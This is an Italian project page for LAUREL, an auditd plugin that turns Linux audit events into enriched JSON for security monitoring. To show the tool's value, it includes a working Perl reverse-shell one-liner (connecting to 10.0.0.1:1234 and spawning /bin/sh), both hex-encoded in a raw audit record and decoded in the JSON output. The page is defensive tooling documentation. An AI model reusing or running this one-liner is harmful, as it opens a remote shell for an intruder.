
Trasforma i log di audit Linux per l'utilizzo SIEM
LAUREL è un plugin di post-elaborazione degli eventi per auditd(8) che genera log di audit basati su JSON utili e arricchiti, adatti per configurazioni moderne di monitoraggio della sicurezza.
La documentazione corrispondente all'ultima release stabile può essere trovata qui.
TLDR: Invece di eventi di audit che assomigliano a questo…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…LAUREL li trasforma in log JSON dove il pasticcio che gli attaccanti/penetration tester/red teamer stanno cercando di fare diventa evidente a prima vista:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
Questo accade alla fonte perché LAUREL viene eseguito sull'host dove vengono generati gli eventi di audit. Gli eventi vengono arricchiti con informazioni utili sul processo padre (ppid):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
I dettagli di configurazione e operativi sono descritti nella pagina di manuale laurel(8). I dettagli sul formato del log e le motivazioni si trovano nella pagina di manuale laurel-about(7). La pagina laurel-audit-rules(7) contiene consigli ed esempi per configurare regole di audit utili per rilevare le tattiche degli attaccanti.
Le istruzioni di installazione di LAUREL contengono indicazioni su come compilare LAUREL dal sorgente e su come installarlo e configurarlo.
Abbiamo sviluppato LAUREL perché non eravamo soddisfatti delle caratteristiche e delle prestazioni dei progetti e prodotti esistenti. Si prega di fare riferimento al documento Performance per i dettagli.
GNU General Public License, versione 3
Il logo è stato creato da Birgit Meyer <[email protected]>.